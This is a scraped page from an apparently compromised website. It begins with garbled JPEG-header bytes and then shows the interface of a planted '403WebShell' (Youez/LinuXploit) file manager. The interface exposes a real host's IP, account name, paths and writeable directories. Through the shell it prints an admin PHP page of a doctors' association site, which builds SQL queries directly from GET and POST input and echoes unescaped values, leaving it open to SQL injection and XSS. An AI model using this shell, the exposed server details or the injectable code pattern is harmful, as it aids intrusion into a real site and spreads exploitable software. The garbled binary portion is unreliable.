JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 91.108.119.182  /  Your IP : 216.73.217.80
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u686484674/domains/idikotabandung.com/public_html/IDI/superadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/u686484674/domains/idikotabandung.com/public_html/IDI/superadmin/edit_ket.php
<?php 

// cek apakah yang mengakses halaman ini sudah login
	// mengaktifkan session php
        session_start();
        if($_SESSION['status'] !="login"){
            header("location:../");

	}

	 ?>

<style type="text/css">
<!--
.style2 {
	font-size: 12px;
	font-weight: bold;
}
.style3 {font-size: 12px}
-->

@import url(http://fonts.googleapis.com/css?family=Montserrat:400,700);

html{   
  background-size: cover;
  height:100%;
}

#feedback-page{
	text-align:center;
}

#form-main{
	width:100%;
	float:left;
	padding-top:0px;
}

#form-div {
	background-color:rgba(255, 206, 86, 0.2);
	padding-left:5px;
	padding-right:5px;
	padding-top:35px;
	padding-bottom:50px;
	width: 500px;
	float: left;
	left: 50%;
	position: absolute;
    margin-top:30px;
	margin-left: -260px;
  -moz-border-radius: 7px;
  -webkit-border-radius: 7px;
}

.feedback-input {
	color:#3c3c3c;
	font-family: Helvetica, Arial, sans-serif;
  font-weight:500;
	font-size: 18px;
	border-radius: 0;
	line-height: 22px;
	background-color: #fbfbfb;
	padding: 13px 13px 13px 54px;
	margin-bottom: 10px;
	width:100%;
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	-ms-box-sizing: border-box;
	box-sizing: border-box;
  border: 3px solid rgba(0,0,0,0);
}

.feedback-input:focus{
	background: #fff;
	box-shadow: 0;
	border: 3px solid #3498db;
	color: #3498db;
	outline: none;
  padding: 13px 13px 13px 54px;
}

.focused{
	color:#30aed6;
	border:#30aed6 solid 3px;
}

/* Icons ---------------------------------- */
#name{
	background-image: url(http://rexkirby.com/kirbyandson/images/name.svg);
	background-size: 30px 30px;
	background-position: 11px 8px;
	background-repeat: no-repeat;
}

#name:focus{
	background-image: url(http://rexkirby.com/kirbyandson/images/name.svg);
	background-size: 30px 30px;
	background-position: 8px 5px;
    background-position: 11px 8px;
	background-repeat: no-repeat;
}

#email{
	background-image: url(http://rexkirby.com/kirbyandson/images/email.svg);
	background-size: 30px 30px;
	background-position: 11px 8px;
	background-repeat: no-repeat;
}

#email:focus{
	background-image: url(http://rexkirby.com/kirbyandson/images/email.svg);
	background-size: 30px 30px;
  background-position: 11px 8px;
	background-repeat: no-repeat;
}

#comment{
	background-image: url(http://rexkirby.com/kirbyandson/images/comment.svg);
	background-size: 30px 30px;
	background-position: 11px 8px;
	background-repeat: no-repeat;
}

textarea {
    width: 100%;
    height: 150px;
    line-height: 150%;
    resize:vertical;
	padding: 5px;
}

input:hover, textarea:hover,
input:focus, textarea:focus {
	background-color:white;
}

#button-blue{
	font-family: 'Montserrat', Arial, Helvetica, sans-serif;
	float:left;
	width: 100%;
	border: #fbfbfb solid 4px;
	cursor:pointer;
	background-color: #3498db;
	color:white;
	font-size:24px;
	padding-top:22px;
	padding-bottom:22px;
	-webkit-transition: all 0.3s;
	-moz-transition: all 0.3s;
	transition: all 0.3s;
  margin-top:-4px;
  font-weight:700;
}

#button-blue:hover{
	background-color: rgba(0,0,0,0);
	color: #0493bd;
}
	
.submit:hover {
	color: #3498db;
}
	
.ease {
	width: 0px;
	height: 74px;
	background-color: #fbfbfb;
	-webkit-transition: .3s ease;
	-moz-transition: .3s ease;
	-o-transition: .3s ease;
	-ms-transition: .3s ease;
	transition: .3s ease;
}

.submit:hover .ease{
  width:100%;
  background-color:white;
}

@media only screen and (max-width: 580px) {
	#form-div{
		left: 3%;
		margin-right: 3%;
		width: 88%;
		margin-left: 0;
		padding-left: 3%;
		padding-right: 3%;
	}
</style>

	<div class="row">
		<div class="panel panel-primary">
			<div class="panel-heading">

				<p>&nbsp;</p>
				<p>&nbsp;</p>
				<h3 align="center" class="panel-title">Supervisor</h3>
			</div>
</div>
</div>	
				
<?php
 include "../koneksi.php";
$sqlEdit = mysqli_query($konek, "SELECT * FROM h_reg_ket where  noreg='$_GET[noreg]'");
$e=mysqli_fetch_array($sqlEdit);
//$pengurus=$e['pengurus'];


$mbstr=$e['mbstr'];
 $date = new DateTime($mbstr);
 $mbstr = $date->format('d-m-Y');
?>

<div id="form-div">		
<h3 align="center">EDIT Surat Keterangan</h3>
		<form method="post" action="">
			<input type="hidden" name='noreg' value="<?php echo $e['noreg']; ?>" />
			<table width="500">
				
				
				<tr>
					<td height="35">Edit Nomor Surat</td>
					
					
					<td><textarea name="noreko" class="form-control"   placeholder="NO Surat" required><?php echo $e['noreko']; ?></textarea></td>
					
					</p>
				</tr>
				
				
				
				<tr>
					<td height="35">ID Anggota</td>
					<td><input type="text" name="npm" class="form-control" readonly  value="<?php echo $e['npm']; ?>" maxlength="10"></td>
					</p>
				</tr>
				
				<tr>
					<td height="36">Nama Anggota Gelar Lengkap (Wajib) </td>
									
					
					<td><textarea name="nmlead" class="form-control"   placeholder="Isi Nama Lengkap Gelar" required><?php echo $e['nmlead']; ?></textarea></td>
					
					
					
					</p>
				</tr>
			
		<tr>
					<td height="35">Ahli lengkap (Terutama Spesialist)</td>
			
			
			
				<td><textarea name="ahli" class="form-control"   placeholder="Isi Ahli Lengkap" required><?php echo $e['ahli']; ?></textarea></td>
			
			
					</p>




				</tr>

<tr>
					<td height="36">Tujuan</td>
									
					
					<td><textarea name="tujuan" class="form-control"   placeholder="Isi Tujuan" required><?php echo $e['tujuan']; ?></textarea></td>
					
					
					
					</p>
				</tr>

		<tr>
					<td height="35">Nomor STR</td>
					<td><input type="text" name="nostr" class="form-control"   value="<?php echo $e['nostr']; ?>" maxlength="50"></td>
					</p>
				</tr>

<br><br>
<tr>
					<td height="35">Untuk merubah Mssa Berlaku STR <br>
						Isi angka 1 Jika Masa berlaku STR 'Selama Mengikuti PPDS'<br><br>
						Isi angka 2 Jika Masa berlaku STR 'Seumur hidup'<br><br>
						Isi angka 3 Jika Masa berlaku STR 'Masih 5 Tahunan'<br><br>
						
						
						Tanggal-Bulan-Tahun, Contoh: 31-12-2023</td>
					<td><input type="text" name="mbstr2" class="form-control"   value="<?php echo $e['mbstr2']; ?>" maxlength="50"></td>
					</p>
				</tr>


<br><br>


		<tr>
					<td height="35">Masa Berlaku STR 5 tahun (masa STR bukan 5 tahun abaikan), Tanggal-Bulan-Tahun, Contoh: 31-12-2023</td>
					<td><input type="text" name="mbstr" class="form-control"   value="<?php echo $mbstr ?>" maxlength="50"></td>
					</p>
				</tr>



				<td height="36"> </td>

				
				<tr>
					<td height="38">&nbsp;</td>
					<td>&nbsp;</td>
				</tr>
				<tr>
					<td height="33"></td>
					<td><input type="submit"  id="button-blue" value="Update" /></td>
				</tr>
		  </table>
		</form>
</div">		
		<!-- proses edit data -->
		<?php if($_SERVER['REQUEST_METHOD']=='POST'){
		
						//variabel untuk menampung inputan dari form
						
						$nmlead	= $_POST['nmlead'];
						$ahli	= $_POST['ahli'];
						$noreg 	= $_POST['noreg'];
						$noreko	= $_POST['noreko'];
						$tujuan	= $_POST['tujuan'];
	$mbstr2	= $_POST['mbstr2'];
	
	$nostr	= $_POST['nostr'];
	
	$mbstr	= $_POST['mbstr'];
	 $date = new DateTime($mbstr);
     $mbstr = $date->format('Y-m-d');
					
							
	$update = mysqli_query($konek, "UPDATE h_reg_ket SET nmlead='$nmlead', ahli='$ahli',noreko='$noreko',tujuan='$tujuan',nostr='$nostr',mbstr='$mbstr',mbstr2='$mbstr2' WHERE noreg='$noreg'");
									//header('location:input_admin.php');
								echo "<script> document.location.href='s_ketfinish01.php'; </script>";
								}
		
		?>




Youez - 2016 - github.com/yon3zu
LinuXploit